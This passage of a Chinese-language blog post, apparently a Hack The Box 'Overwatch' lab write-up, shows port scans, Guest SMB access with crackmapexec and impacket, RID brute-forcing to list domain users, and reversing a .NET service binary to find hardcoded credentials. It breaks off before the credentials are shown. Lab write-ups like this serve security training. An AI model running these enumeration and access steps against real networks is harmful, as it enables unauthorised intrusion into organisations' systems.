{"id":386,"date":"2026-01-31T23:59:00","date_gmt":"2026-01-31T15:59:00","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=386"},"modified":"2026-01-31T16:13:02","modified_gmt":"2026-01-31T08:13:02","slug":"386","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2026\/01\/31\/386\/","title":{"rendered":"HTB\u9776\u673a Overwatch \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.129.12.119<\/strong><\/code>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
PING 10.129.12.119 (10.129.12.119) 56(84) bytes of data.\n64 bytes from 10.129.12.119: icmp_seq=1 ttl=127 time=854 ms\n64 bytes from 10.129.12.119: icmp_seq=2 ttl=127 time=365 ms\n64 bytes from 10.129.12.119: icmp_seq=3 ttl=127 time=287 ms\n64 bytes from 10.129.12.119: icmp_seq=4 ttl=127 time=329 ms\n\n--- 10.129.12.119 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3000ms\nrtt min\/avg\/max\/mdev = 287.127\/458.706\/853.589\/229.662 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.98 scan initiated Sun Jan 25 08:35:51 2026 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.12.119\nNmap scan report for 10.129.12.119\nHost is up (0.28s latency).\nAll 65535 scanned ports on 10.129.12.119 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Jan 25 08:36:39 2026 -- 1 IP address (1 host up) scanned in 48.41 seconds<\/code><\/pre>\n
\u65e0\u6cd5\u63a2\u6d4b\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/strong><\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.98 scan initiated Sun Jan 25 08:38:34 2026 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.12.119\nNmap scan report for 10.129.12.119\nHost is up (0.30s latency).\nNot shown: 65517 filtered tcp ports (no-response)\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Simple DNS Plus\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-25 00:39:34Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)\n3389\/tcp  open  ms-wbt-server Microsoft Terminal Services\n|_ssl-date: 2026-01-25T00:41:19+00:00; +2s from scanner time.\n| ssl-cert: Subject: commonName=S200401.overwatch.htb\n| Not valid before: 2025-12-07T15:16:06\n|_Not valid after:  2026-06-08T15:16:06\n| rdp-ntlm-info: \n|   Target_Name: OVERWATCH\n|   NetBIOS_Domain_Name: OVERWATCH\n|   NetBIOS_Computer_Name: S200401\n|   DNS_Domain_Name: overwatch.htb\n|   DNS_Computer_Name: S200401.overwatch.htb\n|   DNS_Tree_Name: overwatch.htb\n|   Product_Version: 10.0.20348\n|_  System_Time: 2026-01-25T00:40:39+00:00\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n6520\/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM\n| ms-sql-info: \n|   10.129.12.119:6520: \n|     Version: \n|       name: Microsoft SQL Server 2022 RTM\n|       number: 16.00.1000.00\n|       Product: Microsoft SQL Server 2022\n|       Service pack level: RTM\n|       Post-SP patches applied: false\n|_    TCP port: 6520\n| ms-sql-ntlm-info: \n|   10.129.12.119:6520: \n|     Target_Name: OVERWATCH\n|     NetBIOS_Domain_Name: OVERWATCH\n|     NetBIOS_Computer_Name: S200401\n|     DNS_Domain_Name: overwatch.htb\n|     DNS_Computer_Name: S200401.overwatch.htb\n|     DNS_Tree_Name: overwatch.htb\n|_    Product_Version: 10.0.20348\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2026-01-24T21:51:36\n|_Not valid after:  2056-01-24T21:51:36\n|_ssl-date: 2026-01-25T00:41:19+00:00; +1s from scanner time.\n9389\/tcp  open  mc-nmf        .NET Message Framing\n49664\/tcp open  msrpc         Microsoft Windows RPC\n49668\/tcp open  msrpc         Microsoft Windows RPC\n63519\/tcp open  msrpc         Microsoft Windows RPC\n63902\/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2022 (88%)\nOS CPE: cpe:\/o:microsoft:windows_server_2022\nAggressive OS guesses: Microsoft Windows Server 2022 (88%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Host: S200401; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-time: \n|   date: 2026-01-25T00:40:41\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3.1.1: \n|_    Message signing enabled and required\n|_clock-skew: mean: 1s, deviation: 0s, median: 0s\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   315.97 ms 10.10.14.1\n2   316.15 ms 10.129.12.119\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Jan 25 08:41:28 2026 -- 1 IP address (1 host up) scanned in 173.98 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.98 scan initiated Sun Jan 25 08:44:07 2026 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.12.119\nNmap scan report for 10.129.12.119\nHost is up (0.27s latency).\nNot shown: 65531 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n389\/udp open  ldap\n\n# Nmap done at Sun Jan 25 08:45:16 2026 -- 1 IP address (1 host up) scanned in 69.07 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3aWindows Server 2022<\/code>\uff0c\u4e14\u5b89\u88c5\u4e86\u57df\u63a7\u670d\u52a1\uff0c\u4e3b\u57df\u540d\u4e3aoverwatch.htb<\/code>\uff0c\u57df\u63a7\u4e3b\u673a\u540d\u4e3aS200401<\/code>\uff0c\u8fd8\u5f00\u542f\u4e863389\/rdp<\/code>\u548cmssql\/6250<\/code>\u670d\u52a1\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
DNS\u670d\u52a1\uff0853\u7aef\u53e3\uff09<\/h2>\n
\u5c1d\u8bd5\u4f7f\u7528dig<\/code>\u547d\u4ee4\u67e5\u8be2\u5173\u4e8e\u4e3b\u57df\u540d\u7684\u8bb0\u5f55\uff1a<\/p>\n
dig any overwatch.htb @S200401.overwatch.htb<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
\u9664\u57df\u63a7\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u6709\u6548\u8bb0\u5f55\u3002<\/p>\n
Windows SMB\u670d\u52a1\uff08445\u7aef\u53e3\uff09<\/h2>\n
\u5c1d\u8bd5\u4f7f\u7528\u8bbf\u5ba2\u8d26\u6237Guest<\/code>\u767b\u5f55\u9776\u673aSMB<\/code>\u670d\u52a1\uff1a<\/p>\n
crackmapexec smb s200401.overwatch.htb -d overwatch.htb -u Guest -p \"\"<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0Guest<\/code>\u7528\u6237\u4e3a\u542f\u7528\u72b6\u6001\uff0c\u4f7f\u7528impacket-smbclient<\/code>\u767b\u5f55\uff1a<\/p>\n
impacket-smbclient overwatch.htb\/Guest@s200401.overwatch.htb -no-pass<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0SMB<\/code>\u670d\u52a1\u5b58\u5728software<\/code>\u5171\u4eab\uff0c\u63a2\u67e5\u5171\u4eab\u5185\u7684\u6587\u4ef6\uff1a<\/p>\n
use software$\nls<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u5b50\u76ee\u5f55Monitoring<\/code>\uff0c\u4f7f\u7528ls<\/code>\u547d\u4ee4\u5217\u51fa\u76ee\u5f55\uff1a<\/p>\n
<\/p>\n
\"\"<\/p>\n
\u8be5\u76ee\u5f55\u8c8c\u4f3c\u4e3aoverwatch.exe<\/code>\u7684\u5e94\u7528\u7a0b\u5e8f\u4e3b\u76ee\u5f55\uff0c\u67e5\u770boverwatch.exe.config<\/code>\uff1a<\/p>\n
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n  <configSections>\n    <!-- For more information on Entity Framework configuration, visit http:\/\/go.microsoft.com\/fwlink\/?LinkID=237468 -->\n    <section name=\"entityFramework\" type=\"System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\" requirePermission=\"false\" \/>\n  <\/configSections>\n  <system.serviceModel>\n    <services>\n      <service name=\"MonitoringService\">\n        <host>\n          <baseAddresses>\n            <add baseAddress=\"http:\/\/overwatch.htb:8000\/MonitorService\" \/>\n          <\/baseAddresses>\n        <\/host>\n        <endpoint address=\"\" binding=\"basicHttpBinding\" contract=\"IMonitoringService\" \/>\n        <endpoint address=\"mex\" binding=\"mexHttpBinding\" contract=\"IMetadataExchange\" \/>\n      <\/service>\n    <\/services>\n    # ... more lines\n  <\/system.serviceModel>\n  <entityFramework>\n    <providers>\n      <provider invariantName=\"System.Data.SqlClient\" type=\"System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer\" \/>\n      <provider invariantName=\"System.Data.SQLite.EF6\" type=\"System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6\" \/>\n    <\/providers>\n  <\/entityFramework>\n  # ... more lines\n<\/configuration><\/code><\/pre>\n
\u53d1\u73b0overwatch.exe<\/code>\u7684\u670d\u52a1\u540d\u4f3c\u4e4e\u4e3aMonitoringService<\/code>\uff0c\u5728\u5185\u7f518080<\/code>\u7aef\u53e3\u5f00\u542f\u4e86HTTP<\/code>\u670d\u52a1\uff0c\u8def\u5f84\u4e3a\/MonitorService<\/code>\uff0c\u8fd8\u4f7f\u7528\u4e86SqlClient<\/code>\u5e93\u3002<\/p>\n
\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u4fe1\u606f\u3002<\/p>\n
Active Directory\u670d\u52a1<\/h2>\n
\u5c1d\u8bd5\u4f7f\u7528Kerberos<\/code>\u5bf9Guest<\/code>\u8fdb\u884c\u8ba4\u8bc1\uff1a<\/p>\n
netexec ldap -d overwatch.htb -u Guest -p \"\" -k s200401.overwatch.htb<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
\u8ba4\u8bc1\u6210\u529f\uff01\u540c\u65f6\u53d1\u73b0LDAP<\/code>\u670d\u52a1\u672a\u8fdb\u884c\u7b7e\u540d\u3002<\/p>\n
\u76f4\u63a5\u4f7f\u7528impacket-lookupsid<\/code>\u5de5\u5177\u7206\u7834\u57df\u5185RID<\/code>\u83b7\u53d6\u7528\u6237\u540d\u5217\u8868\uff1a<\/p>\n
impacket-lookupsid overwatch.htb\/Guest@s200401.overwatch.htb -no-pass -domain-sids 40000<\/code><\/pre>\n
<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u5982\u4e0b\u7528\u6237\uff0c\u76f4\u63a5\u4fdd\u5b58\u5230aduser.lst<\/code>\u5185\uff1a<\/p>\n
Administrator   Guest   krbtgt  S200401$        sqlsvc\nsqlmgmt SQL03$  NB001$  NB002$  FILE01$\nS200400$        Charlie.Moss    Tracy.Burns     Kathryn.Bryan   Rachael.Thomas\nAimee.Smith     Duncan.Freeman  John.Begum      Bernard.Hilton  Kim.Hargreaves\nDouglas.Burrows Carole.Murray   Olivia.Quinn    Trevor.Baker    Kenneth.Dennis\nJeremy.Marshall Jodie.Jones     Thomas.Lee      Terence.Matthews        Colin.Roberts\nAaron.Robinson  Amanda.Jenkins  Debra.Arnold    Michelle.Willis Kayleigh.Jones\nAdam.Russell    Tracey.Kelly    Bethan.Dale     Mandy.Wood      Jenna.Phillips\nCarole.Yates    Graham.Perry    Catherine.Griffiths     Shaun.Jackson   Bethan.Rogers\nEllie.Singh     Marie.Allan     Patrick.Holmes  Victor.Hopkins  Geraldine.Harper\nGeorge.Todd     Karl.Smith      Jacqueline.Norton       Frederick.Murray        Joe.Pearce\nPaul.Collins    Damien.Edwards  Eileen.Phillips Carl.Johnson    Kevin.Newton\nNatalie.Higgins Francis.Weston  Benjamin.Davison        Martin.Kemp     Angela.Jones\nGareth.Ahmed    Deborah.Morgan  Grace.Taylor    Roger.Hughes    Albert.Barrett\nGrace.Curtis    Marilyn.Griffiths       Tracey.Barker   Suzanne.Hughes  Timothy.Jackson\nBeverley.Thompson       Clare.Bartlett  Irene.Johnson   Bernard.Wood    Frank.McCarthy\nElaine.Page     Elaine.Walker   Mohammad.Hill   Glenn.Field     Deborah.Martin\nGail.Sullivan   Maureen.Kirby   Georgina.Chambers       Philip.Harris   Samantha.Scott\nAnn.Hill        Chloe.Cox       Jamie.Gough     Frederick.Hussain       Dean.Hobbs\nDanielle.Moore  Timothy.Smith   Declan.Stone    Jacob.Wilson    Gary.Elliott\nPeter.Slater    Louise.Walton   Brett.Haynes    Elliot.Green    Wendy.Williams\nGraham.Parker   Abdul.Stevens   Brett.Bailey    Benjamin.Harrison       Emily.Cooper\nRoger.Spencer<\/code><\/pre>\n
\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
\u67e5\u770b.NET\u7a0b\u5e8fIL\u4ee3\u7801\u53d1\u73b0\u51ed\u636e<\/h2>\n
\u5728\u670d\u52a1\u63a2\u6d4b\u9636\u6bb5\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0\u9776\u673aGuest<\/code>\u7528\u6237\u5904\u4e8e\u5f00\u542f\u72b6\u6001\uff0c\u5e76\u4f7f\u7528\u5176\u767b\u5f55\u4e86SMB<\/code>\u5171\u4eab\u3002\u7531\u4e8e\u540e\u7eed\u672a\u6536\u96c6\u5230\u5176\u5b83\u6709\u6548\u4fe1\u606f\uff0c\u63a8\u6d4bSMB<\/code>\u5171\u4eab\u5185\u7684overwatch.exe<\/code>\u5b58\u5728\u64cd\u4f5c\u6570\u636e\u5e93\u7684\u529f\u80fd\uff0c\u4e8e\u662f\u51b3\u5b9a\u4e0b\u8f7d\u8be5\u7a0b\u5e8f\uff0c\u8fdb\u884c\u9006\u5411\u5206\u6790\u3002<\/p>\n
\u76f4\u63a5\u767b\u5f55SMB<\/code>\uff0c\u4f7f\u7528get<\/code>\u547d\u4ee4\u4e0b\u8f7d\u8be5\u7a0b\u5e8f\uff1a<\/p>\n
get overwatch.exe<\/code><\/pre>\n
\u968f\u540e\u4f7f\u7528IDA Pro<\/code>\u6253\u5f00\uff0c\u53d1\u73b0\u8be5\u7a0b\u5e8f\u4f7f\u7528.NET<\/code>\u8bed\u8a00\u7f16\u5199\uff1a<\/p>\n
<\/p>\n
\"\"<\/p>\n
\u7ffb\u9605IL<\/code>\u4ee3\u7801\uff0c\u5728Program__CheckEdgeHistory<\/code>\u65b9\u6cd5\u4e2d\u53d1\u73b0\u4e86\u786c\u7f16\u7801\u4e86\u6570\u636e\u5e93\u8fde\u63a5\u51ed\u636e\u7684\u5b57\u7b26\u4e32\u53d8\u91cfaServerLocalhos<\/code>\uff1a<\/p>\n
<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0\u57df\u7528\u6237\u51ed\u636e\uff1a<\/p>\n